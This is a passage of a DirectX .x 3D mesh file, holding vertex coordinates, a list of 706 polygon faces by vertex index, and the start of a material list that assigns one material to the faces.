-0.164423;-0.583321;0.450148;, -0.164426;-0.583321;0.305769;, -0.164429;-0.583321;0.161389;, -0.140093;-0.583321;0.450148;, -0.221855;0.320235;0.436236;, -0.207726;0.316618;0.211503;, -0.207721;0.316618;0.417957;, -0.067114;0.280641;0.419831;, -0.067120;0.280641;0.211499;, -0.185699;0.289901;0.378365;, -0.099263;0.267785;0.379516;, -0.099267;0.267785;0.251452;, -0.185703;0.289901;0.251454;, -0.185711;0.289901;-0.085283;, -0.099277;0.267785;-0.086439;, -0.099277;0.267785;-0.136658;, -0.185712;0.289901;-0.137810;, -0.185705;0.289901;0.134616;, -0.099270;0.267785;0.134613;, -0.099273;0.267785;0.006547;, -0.185709;0.289901;0.007704;, -0.099283;0.267785;-0.357710;, -0.185719;0.289901;-0.357707;, -0.185715;0.289901;-0.230796;, -0.099279;0.267785;-0.229645;, -0.067126;0.280641;-0.070702;, -0.067130;0.280641;-0.152398;, -0.207736;0.316618;-0.154271;, -0.207733;0.316618;-0.068822;, -0.067121;0.280641;0.174565;, -0.067125;0.280641;-0.033766;, -0.207733;0.316618;-0.031887;, -0.207727;0.316618;0.174568;, -0.207742;0.316618;-0.397660;, -0.207737;0.316618;-0.191206;, -0.067131;0.280641;-0.189332;, -0.067135;0.280641;-0.397664;, -0.221868;0.320235;-0.050164;, -0.221871;0.320235;-0.172926;, -0.164428;-0.583321;0.231688;, -0.164433;-0.583321;0.043281;, -0.052996;0.277026;-0.170675;, -0.052992;0.277026;-0.052424;, 0.283278;-0.022248;0.420086;, 0.283264;-0.022248;-0.145140;, 0.283248;-0.022248;-0.710365;, -0.070942;-0.426945;0.420095;, -0.070956;-0.426945;-0.145131;, -0.070972;-0.426945;-0.710355;, -0.140123;-0.583321;-0.710354;, -0.140110;-0.583321;-0.145129;, -0.140094;-0.583321;0.420097;, -0.138361;-0.528404;0.305499;, -0.140156;-0.506977;0.271230;, -0.142529;-0.537832;0.293392;, -0.127461;-0.478268;0.271230;, -0.110403;-0.465180;0.305498;, -0.106232;-0.455753;0.293391;, -0.142540;-0.537832;-0.018424;, -0.140164;-0.506977;0.003737;, -0.138369;-0.528404;-0.030532;, -0.110411;-0.465180;-0.030533;, -0.127469;-0.478268;0.003737;, -0.106241;-0.455753;-0.018425;, -0.008569;-0.324373;0.305495;, -0.003901;-0.303384;0.271227;, -0.015359;-0.332129;0.293389;, 0.169681;-0.105068;0.271222;, 0.189867;-0.097658;0.305490;, 0.196656;-0.089901;0.293383;, -0.015368;-0.332129;-0.018428;, -0.003908;-0.303384;0.003734;, -0.008578;-0.324373;-0.030535;, 0.189857;-0.097658;-0.030541;, 0.169674;-0.105068;0.003729;, 0.196648;-0.089901;-0.018433;, -0.008584;-0.324373;-0.259730;, -0.003914;-0.303384;-0.293998;, -0.015374;-0.332129;-0.271836;, 0.169667;-0.105068;-0.294003;, 0.189852;-0.097658;-0.259735;, 0.196641;-0.089901;-0.271842;, -0.015383;-0.332129;-0.583653;, -0.003922;-0.303384;-0.561492;, -0.008594;-0.324373;-0.595762;, 0.189843;-0.097658;-0.595767;, 0.169660;-0.105068;-0.561497;, 0.196632;-0.089901;-0.583659;, -0.138375;-0.528404;-0.259726;, -0.140172;-0.506977;-0.293994;, -0.142543;-0.537832;-0.271833;, -0.127475;-0.478268;-0.293995;, -0.110417;-0.465180;-0.259727;, -0.106247;-0.455753;-0.271834;, -0.142553;-0.537832;-0.583650;, -0.140178;-0.506977;-0.561488;, -0.138383;-0.528404;-0.595759;, -0.110426;-0.465180;-0.595759;, -0.127483;-0.478268;-0.561489;, -0.106256;-0.455753;-0.583651;, 0.196626;-0.089901;-0.837067;, 0.169652;-0.105068;-0.859228;, 0.189836;-0.097658;-0.824961;, 0.169645;-0.105068;-1.126721;, 0.196618;-0.089901;-1.148884;, 0.189827;-0.097658;-1.160990;, -0.008599;-0.324373;-0.824956;, -0.003931;-0.303384;-0.859224;, -0.015389;-0.332129;-0.837062;, -0.015398;-0.332129;-1.148878;, -0.003937;-0.303384;-1.126717;, -0.008607;-0.324373;-1.160985;, -0.110441;-0.465180;-1.160982;, -0.127498;-0.478268;-1.126714;, -0.106270;-0.455753;-1.148876;, -0.140194;-0.506977;-1.126713;, -0.138398;-0.528404;-1.160982;, -0.142569;-0.537832;-1.148875;, -0.106262;-0.455753;-0.837059;, -0.127491;-0.478268;-0.859221;, -0.110431;-0.465180;-0.824953;, -0.138390;-0.528404;-0.824953;, -0.140186;-0.506977;-0.859220;, -0.142559;-0.537832;-0.837058;, -0.133136;-0.542002;-1.148875;, -0.128969;-0.532574;-1.160982;, -0.129185;-0.558553;-1.176884;, -0.133127;-0.542002;-0.837058;, -0.129175;-0.558553;-0.809051;, -0.128961;-0.532574;-0.824953;, -0.101001;-0.469352;-0.824954;, -0.081927;-0.451710;-0.809052;, -0.096831;-0.459924;-0.837060;, -0.096840;-0.459924;-1.148876;, -0.081937;-0.451710;-1.176885;, -0.101010;-0.469352;-1.160983;, 0.197587;-0.104450;-1.160990;, 0.204378;-0.096692;-1.148884;, 0.226391;-0.087194;-1.183971;, -0.000850;-0.331163;-1.160985;, -0.014138;-0.361999;-1.183964;, -0.007639;-0.338921;-1.148878;, -0.007630;-0.338921;-0.837062;, -0.014129;-0.361999;-0.801975;, -0.000842;-0.331163;-0.824956;, 0.197596;-0.104450;-0.824961;, 0.226401;-0.087194;-0.801982;, 0.204386;-0.096692;-0.837067;, -0.096818;-0.459924;-0.271834;, -0.100986;-0.469352;-0.259727;, -0.081913;-0.451710;-0.243827;, -0.096824;-0.459924;-0.583651;, -0.081923;-0.451710;-0.611658;, -0.100996;-0.469352;-0.595760;, -0.128954;-0.532574;-0.595759;, -0.129170;-0.558553;-0.611657;, -0.133121;-0.542002;-0.583650;, -0.133113;-0.542002;-0.271833;, -0.129160;-0.558553;-0.243825;, -0.128944;-0.532574;-0.259726;, 0.204401;-0.096692;-0.271842;, 0.197612;-0.104450;-0.259735;, 0.226416;-0.087194;-0.236758;, 0.204392;-0.096692;-0.583659;, 0.226406;-0.087194;-0.618745;, 0.197604;-0.104450;-0.595767;, -0.000835;-0.331163;-0.595762;, -0.014124;-0.361999;-0.618739;, -0.007624;-0.338921;-0.583654;, -0.007617;-0.338921;-0.271836;, -0.014114;-0.361999;-0.236752;, -0.000825;-0.331163;-0.259730;, 0.204416;-0.096692;0.293383;, 0.197627;-0.104450;0.305490;, 0.226429;-0.087194;0.328468;, 0.204408;-0.096692;-0.018433;, 0.226420;-0.087194;-0.053520;, 0.197618;-0.104450;-0.030541;, -0.000820;-0.331163;-0.030536;, -0.014110;-0.361999;-0.053514;, -0.007609;-0.338921;-0.018428;, -0.007601;-0.338921;0.293389;, -0.014098;-0.361999;0.328474;, -0.000810;-0.331163;0.305495;, -0.096802;-0.459924;0.293391;, -0.100971;-0.469352;0.305498;, -0.081898;-0.451710;0.321398;, -0.096810;-0.459924;-0.018426;, -0.081907;-0.451710;-0.046434;, -0.100980;-0.469352;-0.030533;, -0.128939;-0.532574;-0.030532;, -0.129155;-0.558553;-0.046432;, -0.133106;-0.542002;-0.018425;, -0.133097;-0.542002;0.293392;, -0.129146;-0.558553;0.321399;, -0.128931;-0.532574;0.305498;, -0.244513;0.366582;-0.832616;, -0.244516;0.366582;-1.025288;, -0.244522;0.366582;-1.217959;, -0.244495;0.366582;-0.223454;, -0.244500;0.366582;-0.416126;, -0.244505;0.366582;-0.608797;, -0.244479;0.366582;0.385708;, -0.244485;0.366582;0.193037;, -0.244490;0.366582;0.000365;, -0.164422;-0.610748;0.475883;, -0.164423;-0.610748;0.450148;, -0.164426;-0.610748;0.305769;, -0.164429;-0.610748;0.161389;, -0.164428;-0.610748;0.231688;, -0.164433;-0.610748;0.043281;, -0.164443;-0.610748;-0.333536;, -0.164447;-0.610748;-0.521945;, -0.164460;-0.610748;-0.993646;, -0.164464;-0.610748;-1.138024;, -0.164468;-0.610748;-1.282404;, -0.164468;-0.610748;-1.308140;, -0.140140;-0.610748;-1.308140;, -0.140140;-0.610748;-1.282405;, -0.140124;-0.610748;-0.710354;, -0.140110;-0.610748;-0.145129;, -0.140094;-0.610748;0.420097;, -0.140093;-0.610748;0.450148;, -0.140093;-0.610748;0.475882;; 706; 4;417,418,351,353;, 4;418,419,362,351;, 8;362,309,321,319,317,355,353,351;, 4;416,417,353,355;, 5;355,317,255,4,416;, 4;317,319,254,255;, 4;319,321,253,254;, 4;321,309,252,253;, 4;309,308,251,252;, 4;22,251,308,312;, 4;23,22,312,314;, 4;648,23,314,357;, 5;308,363,357,314,312;, 3;357,363,359;, 4;359,363,420,649;, 4;357,359,649,648;, 4;419,420,363,362;, 3;363,308,362;, 3;308,309,362;, 4;354,352,418,417;, 4;356,354,417,416;, 4;315,356,416,4;, 4;4,255,316,315;, 4;255,254,318,316;, 4;254,253,320,318;, 4;257,318,320,256;, 4;258,316,318,257;, 4;3,315,316,258;, 4;413,356,315,3;, 4;414,354,356,413;, 4;415,352,354,414;, 3;411,415,414;, 6;367,477,415,411,401,380;, 3;402,401,411;, 4;402,411,405,403;, 4;403,405,412,404;, 4;400,403,404,397;, 4;399,402,403,400;, 4;398,401,402,399;, 4;400,397,398,399;, 4;397,404,401,398;, 5;401,404,412,377,380;, 4;377,412,372,378;, 4;392,377,378,389;, 4;391,380,377,392;, 4;390,379,380,391;, 3;379,367,380;, 4;378,372,367,379;, 4;384,367,372,381;, 4;381,372,371,382;, 4;0,371,372,1;, 4;1,299,300,0;, 4;289,300,299,290;, 4;290,299,304,287;, 4;287,304,303,288;, 4;276,287,288,277;, 4;278,275,276,277;, 4;278,289,290,275;, 4;288,303,300,289;, 4;296,300,303,297;, 4;297,303,305,298;, 4;286,297,298,283;, 4;285,296,297,286;, 4;284,295,296,285;, 4;295,306,300,296;, 4;12,0,300,38;, 4;633,371,0,12;, 5;631,632,633,12,13;, 4;12,39,40,13;, 3;39,12,38;, 4;283,298,295,284;, 4;286,283,284,285;, 3;304,257,303;, 3;257,304,291;, 3;257,291,270;, 5;294,259,267,270,291;, 4;293,299,259,294;, 4;282,293,294,279;, 4;279,294,291,280;, 4;280,291,292,281;, 3;292,291,304;, 4;292,304,299,293;, 4;281,292,293,282;, 4;282,279,280,281;, 4;43,299,1,11;, 4;11,1,372,628;, 5;628,629,630,10,11;, 4;10,42,43,11;, 3;42,10,41;, 4;10,2,266,41;, 4;630,405,2,10;, 4;2,405,413,3;, 4;405,411,414,413;, 4;3,258,266,2;, 4;258,257,260,266;, 4;268,266,260,269;, 3;269,260,270;, 4;272,269,270,273;, 4;271,268,269,272;, 4;274,267,268,271;, 4;267,259,266,268;, 4;273,270,267,274;, 4;272,273,274,271;, 5;195,244,257,256,194;, 4;244,195,196,245;, 4;245,330,332,244;, 4;244,332,334,243;, 4;243,334,336,6;, 4;6,336,338,428;, 4;428,338,340,427;, 4;427,340,342,426;, 4;424,423,342,340;, 4;425,424,340,338;, 4;5,425,338,336;, 4;336,334,246,5;, 4;334,332,247,246;, 4;332,330,248,247;, 4;243,235,241,244;, 4;7,235,243,6;, 4;6,428,436,7;, 4;427,430,436,428;, 4;475,430,427,426;, 6;476,474,461,440,430,475;, 3;474,476,473;, 4;457,474,473,458;, 4;458,473,470,459;, 4;459,470,469,460;, 4;448,459,460,445;, 4;448,445,446,447;, 4;446,457,458,447;, 4;460,469,474,457;, 4;462,474,469,463;, 3;462,461,474;, 4;450,461,462,451;, 4;451,462,463,452;, 4;452,463,464,449;, 4;463,469,429,464;, 5;464,429,437,440,461;, 4;437,429,436,438;, 4;444,437,438,441;, 4;443,440,437,444;, 4;442,439,440,443;, 3;439,430,440;, 4;438,436,430,439;, 4;441,438,439,442;, 4;442,443,444,441;, 4;14,7,436,634;, 4;37,235,7,14;, 4;15,36,37,14;, 4;14,635,636,15;, 3;635,14,634;, 4;449,464,461,450;, 4;452,449,450,451;, 4;466,470,473,467;, 4;455,466,467,456;, 4;456,453,454,455;, 4;454,465,466,455;, 4;453,468,465,454;, 4;456,467,468,453;, 4;467,473,366,468;, 3;476,366,473;, 4;366,476,477,368;, 4;373,366,368,374;, 4;374,368,371,375;, 4;375,371,365,376;, 4;386,375,376,387;, 4;385,374,375,386;, 4;388,373,374,385;, 4;386,387,388,385;, 4;387,376,373,388;, 6;468,366,373,376,365,465;, 4;465,365,470,466;, 4;13,9,470,631;, 4;40,201,9,13;, 4;224,213,214,225;, 4;213,198,197,214;, 4;257,241,197,198;, 4;197,241,231,210;, 3;232,231,241;, 4;232,241,235,233;, 4;382,371,368,383;, 4;383,368,367,384;, 3;368,477,367;, 4;394,383,384,395;, 4;394,395,396,393;, 4;396,381,382,393;, 4;389,378,379,390;, 4;390,391,392,389;, 4;352,361,419,418;, 4;361,364,420,419;, 4;406,364,361,410;, 4;410,361,352,415;, 4;572,410,415,570;, 4;570,415,477,578;, 4;569,570,578,579;, 3;569,568,570;, 4;571,572,570,568;, 3;572,571,573;, 4;574,575,572,573;, 4;575,480,410,572;, 4;566,410,480,563;, 4;558,406,410,566;, 4;560,481,406,558;, 4;650,406,481,651;, 4;651,481,482,652;, 4;590,482,481,587;, 4;587,481,480,584;, 4;584,480,479,582;, 4;602,479,480,599;, 4;599,480,477,596;, 4;596,477,476,594;, 4;595,596,594,592;, 3;596,595,597;, 4;598,599,596,597;, 3;599,598,600;, 4;601,602,599,600;, 3;602,601,603;, 4;593,594,602,603;, 3;593,592,594;, 4;594,476,479,602;, 4;611,479,476,608;, 4;608,476,475,606;, 4;607,608,606,604;, 3;608,607,609;, 4;610,611,608,609;, 3;611,610,612;, 4;613,614,611,612;, 4;614,478,479,611;, 4;620,479,478,618;, 4;623,482,479,620;, 4;626,483,482,623;, 4;652,482,483,653;, 4;653,483,435,654;, 4;483,478,431,435;, 4;478,475,426,431;, 4;426,342,344,431;, 4;431,344,346,435;, 4;435,346,348,654;, 4;348,346,421,655;, 4;346,344,422,421;, 4;423,422,344,342;, 4;606,475,478,614;, 4;605,606,614,615;, 3;614,613,615;, 3;617,616,618;, 4;617,618,626,627;, 3;626,625,627;, 4;625,626,623,624;, 3;623,622,624;, 4;622,623,620,621;, 3;620,619,621;, 4;619,620,618,616;, 4;618,478,483,626;, 3;605,604,606;, 4;582,479,482,590;, 4;581,582,590,591;, 3;590,589,591;, 4;589,590,587,588;, 3;587,586,588;, 4;586,587,584,585;, 3;584,583,585;, 4;583,584,582,580;, 3;581,580,582;, 4;578,477,480,575;, 4;577,578,575,576;, 3;575,574,576;, 3;563,562,564;, 4;562,563,560,561;, 3;560,559,561;, 4;559,560,558,556;, 3;557,556,558;, 4;557,558,566,567;, 3;566,565,567;, 4;565,566,563,564;, 4;563,480,481,560;, 3;578,577,579;, 4;252,251,307,310;, 4;311,307,251,22;, 4;265,307,311,21;, 4;261,310,307,265;, 4;256,320,310,261;, 4;253,252,310,320;, 4;101,256,261,99;, 4;99,261,191,96;, 4;108,191,261,105;, 4;105,261,265,113;, 4;113,265,190,111;, 4;20,190,265,21;, 4;19,189,190,20;, 4;84,190,189,81;, 4;87,191,190,84;, 4;89,192,191,87;, 4;72,191,192,69;, 4;71,72,69,70;, 3;72,71,73;, 4;86,87,84,85;, 3;84,83,85;, 4;83,84,81,82;, 4;81,189,192,89;, 4;51,192,189,48;, 4;48,189,188,45;, 4;18,188,189,19;, 4;17,236,188,18;, 4;236,240,193,188;, 4;240,245,196,193;, 4;240,328,330,245;, 4;236,326,328,240;, 4;17,324,326,236;, 4;16,250,326,324;, 4;250,249,328,326;, 4;330,328,249,248;, 4;57,193,196,65;, 4;65,196,195,63;, 4;63,195,192,60;, 4;60,192,193,57;, 4;53,193,192,51;, 4;55,53,51,52;, 3;51,50,52;, 4;50,51,48,49;, 3;48,47,49;, 4;47,48,45,46;, 4;45,188,193,53;, 3;54,53,55;, 4;59,60,57,58;, 3;60,59,61;, 4;62,63,60,61;, 3;63,62,64;, 4;67,65,63,64;, 3;66,65,67;, 4;69,192,195,77;, 3;90,89,91;, 4;91,89,87,88;, 3;87,86,88;, 4;111,190,191,108;, 4;110,111,108,109;, 3;108,107,109;, 4;107,108,105,106;, 3;111,110,112;, 4;115,113,111,112;, 3;114,113,115;, 4;98,99,96,97;, 3;99,98,100;, 4;103,101,99,100;, 4;649,420,364,360;, 4;650,360,364,406;, 4;648,649,360,358;, 4;358,313,23,648;, 4;313,311,22,23;, 4;21,311,313,24;, 4;24,313,358,647;, 4;647,358,360,650;, 5;651,645,646,647,650;, 4;652,640,645,651;, 3;641,645,640;, 3;645,641,642;, 3;645,642,643;, 3;640,652,653;, 3;640,653,639;, 4;639,653,654,638;, 4;654,348,350,638;, 4;638,350,322,33;, 4;33,322,324,17;, 4;324,322,34,16;, 4;637,34,322,350;, 4;655,637,350,348;, 6;19,31,32,33,17,18;, 3;31,19,29;, 3;31,29,30;, 6;27,28,29,19,20,26;, 5;26,20,21,24,25;, 4;24,262,263,25;, 4;25,263,264,26;, 4;26,264,301,27;, 4;27,301,302,28;, 4;28,302,199,29;, 4;29,199,200,30;, 4;408,263,262,409;, 6;301,264,263,408,407,370;, 4;301,370,369,302;, 5;302,369,472,200,199;, 3;471,200,472;, 3;471,433,200;, 4;200,433,432,239;, 3;433,471,434;, 4;646,408,409,647;, 4;645,407,408,646;, 4;644,370,407,645;, 4;643,369,370,644;, 4;642,472,369,643;, 4;641,471,472,642;, 4;104,105,113,114;, 3;105,104,106;, 4;647,409,262,24;, 4;548,557,567,544;, 4;546,544,567,565;, 4;546,565,564,550;, 4;552,550,564,562;, 4;552,562,561,553;, 4;555,553,561,559;, 4;555,559,556,549;, 4;548,549,556,557;, 3;645,643,644;, 4;528,526,588,586;, 4;528,586,585,529;, 4;531,529,585,583;, 4;531,583,580,525;, 4;524,525,580,581;, 4;524,581,591,520;, 4;522,520,591,589;, 4;522,589,588,526;, 4;510,601,600,514;, 4;516,514,600,598;, 4;516,598,597,517;, 4;519,517,597,595;, 4;519,595,592,513;, 4;512,513,592,593;, 4;512,593,603,508;, 4;510,508,603,601;, 4;504,610,609,505;, 4;507,505,609,607;, 4;507,607,604,501;, 4;500,501,604,605;, 4;500,605,615,496;, 4;498,496,615,613;, 4;498,613,612,502;, 4;504,502,612,610;, 4;495,493,621,619;, 4;492,622,621,493;, 4;492,490,624,622;, 4;486,625,624,490;, 4;486,484,627,625;, 4;488,617,627,484;, 4;488,489,616,617;, 4;495,619,616,489;, 4;640,434,471,641;, 4;432,638,33,239;, 3;238,200,239;, 3;237,200,238;, 4;30,200,237,31;, 4;46,44,187,185;, 4;187,44,54,183;, 4;54,55,182,183;, 4;182,55,52,176;, 4;52,50,178,176;, 4;178,50,49,179;, 4;49,47,181,179;, 4;181,47,46,185;, 4;169,59,58,173;, 4;61,59,169,167;, 4;166,62,61,167;, 4;64,62,166,164;, 4;170,67,64,164;, 4;66,67,170,171;, 4;175,56,66,171;, 4;58,56,175,173;, 4;163,68,78,159;, 4;78,79,158,159;, 4;158,79,76,152;, 4;76,74,154,152;, 4;154,74,73,155;, 4;73,71,157,155;, 4;157,71,70,161;, 4;70,68,163,161;, 4;90,91,146,147;, 4;151,80,90,147;, 4;82,80,151,149;, 4;145,83,82,149;, 4;85,83,145,143;, 4;142,86,85,143;, 4;88,86,142,140;, 4;146,91,88,140;, 4;118,110,109,119;, 4;109,107,121,119;, 4;121,107,106,125;, 4;106,104,127,125;, 4;127,104,114,123;, 4;114,115,122,123;, 4;122,115,112,116;, 4;112,110,118,116;, 4;97,95,133,131;, 4;133,95,94,137;, 4;94,92,139,137;, 4;139,92,102,135;, 4;102,103,134,135;, 4;134,103,100,128;, 4;100,98,130,128;, 4;130,98,97,131;, 4;275,290,287,276;, 4;277,288,289,278;, 3;257,270,260;, 3;244,241,257;, 4;225,214,211,226;, 4;223,212,213,224;, 4;447,458,459,448;, 4;445,460,457,446;, 4;393,382,383,394;, 4;395,384,381,396;, 4;534,532,579,577;, 4;534,577,576,538;, 4;540,538,576,574;, 4;540,574,573,541;, 4;543,541,573,571;, 4;543,571,568,537;, 4;536,537,568,569;, 4;536,569,579,532;, 4;126,127,123,124;, 3;123,122,124;, 4;124,122,116,117;, 4;120,126,124,117;, 4;120,121,125,126;, 3;126,125,127;, 4;117,118,119,120;, 3;117,116,118;, 3;120,119,121;, 3;198,305,257;, 3;303,257,305;, 4;93,194,256,101;, 4;92,93,101,102;, 3;102,101,103;, 3;93,92,94;, 4;95,96,93,94;, 3;96,95,97;, 4;96,191,194,93;, 4;75,194,191,72;, 4;77,195,194,75;, 4;79,77,75,76;, 3;75,74,76;, 4;74,75,72,73;, 3;69,68,70;, 4;68,69,77,78;, 3;78,77,79;, 4;136,134,128,129;, 3;129,128,130;, 4;129,130,131,132;, 4;132,138,136,129;, 4;138,139,135,136;, 3;135,134,136;, 4;132,133,137,138;, 3;132,131,133;, 3;138,137,139;, 4;629,412,405,630;, 4;628,372,412,629;, 4;41,266,259,42;, 4;42,259,299,43;, 3;536,535,537;, 4;542,543,537,535;, 3;542,541,543;, 4;539,540,541,542;, 4;542,535,533,539;, 4;535,536,532,533;, 3;533,532,534;, 4;533,534,538,539;, 3;539,538,540;, 3;545,544,546;, 4;547,548,544,545;, 3;548,547,549;, 4;554,555,549,547;, 4;554,547,545,551;, 4;545,546,550,551;, 3;551,550,552;, 4;551,552,553,554;, 3;554,553,555;, 4;141,142,143,144;, 3;144,143,145;, 4;144,145,149,150;, 4;144,150,148,141;, 4;148,146,140,141;, 3;141,140,142;, 3;147,146,148;, 4;150,151,147,148;, 3;150,149,151;, 4;80,81,89,90;, 3;81,80,82;, 4;38,300,306,39;, 4;39,306,201,40;, 4;632,365,371,633;, 4;631,470,365,632;, 3;530,529,531;, 4;527,528,529,530;, 3;527,526,528;, 4;521,522,526,527;, 4;530,523,521,527;, 4;530,531,525,523;, 3;524,523,525;, 4;523,524,520,521;, 3;521,520,522;, 4;153,154,155,156;, 3;156,155,157;, 4;156,157,161,162;, 4;156,162,160,153;, 4;160,158,152,153;, 3;153,152,154;, 4;162,163,159,160;, 3;162,161,163;, 3;159,158,160;, 3;518,517,519;, 4;515,516,517,518;, 3;515,514,516;, 4;509,510,514,515;, 4;518,511,509,515;, 4;518,519,513,511;, 3;512,511,513;, 4;511,512,508,509;, 3;509,508,510;, 6;295,298,305,203,206,306;, 4;205,201,306,206;, 4;216,205,206,217;, 4;217,206,203,218;, 4;218,203,204,215;, 4;203,305,198,204;, 4;204,198,201,205;, 4;212,201,198,213;, 4;211,202,201,212;, 4;9,201,202,8;, 4;8,469,470,9;, 4;636,469,8,15;, 4;15,8,202,35;, 3;36,15,35;, 4;207,242,202,208;, 4;208,202,197,209;, 3;209,197,210;, 4;220,209,210,221;, 4;219,208,209,220;, 4;222,207,208,219;, 4;220,221,222,219;, 4;221,210,207,222;, 5;231,234,242,207,210;, 4;233,235,242,234;, 4;230,233,234,227;, 4;227,234,231,228;, 4;228,231,232,229;, 4;230,227,228,229;, 4;229,232,233,230;, 4;214,197,202,211;, 4;226,211,212,223;, 4;224,225,226,223;, 4;215,204,205,216;, 4;216,217,218,215;, 4;639,433,434,640;, 4;638,432,433,639;, 4;635,429,469,636;, 4;634,436,429,635;, 4;35,202,242,36;, 4;36,242,235,37;, 3;506,505,507;, 4;503,504,505,506;, 3;503,502,504;, 4;497,498,502,503;, 4;506,499,497,503;, 4;506,507,501,499;, 3;500,499,501;, 4;499,500,496,497;, 3;497,496,498;, 4;31,237,238,32;, 4;32,238,239,33;, 3;494,493,495;, 4;491,492,493,494;, 3;491,490,492;, 4;485,486,490,491;, 4;494,487,485,491;, 4;494,495,489,487;, 3;488,487,489;, 4;487,488,484,485;, 3;485,484,486;, 3;177,176,178;, 4;177,178,179,180;, 3;180,179,181;, 4;180,181,185,186;, 4;180,186,184,177;, 4;184,182,176,177;, 3;183,182,184;, 4;186,187,183,184;, 3;186,185,187;, 4;44,45,53,54;, 3;45,44,46;, 4;165,166,167,168;, 3;168,167,169;, 4;168,169,173,174;, 4;168,174,172,165;, 4;172,170,164,165;, 3;165,164,166;, 4;174,175,171,172;, 3;174,173,175;, 3;171,170,172;, 4;56,57,65,66;, 3;57,56,58;, 4;339,341,423,424;, 4;341,343,422,423;, 8;339,337,335,333,331,329,343,341;, 4;337,339,424,425;, 5;5,246,335,337,425;, 4;246,247,333,335;, 4;247,248,331,333;, 4;248,249,329,331;, 4;327,329,249,250;, 4;325,327,250,16;, 3;323,327,325;, 4;16,34,323,325;, 4;349,323,34,637;, 4;349,345,329,323;, 3;345,349,347;, 4;347,349,637,655;, 4;655,421,345,347;, 4;421,422,343,345;, 3;345,343,329;, 3;327,323,329;; MeshMaterialList { 1; 706; 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 0;, 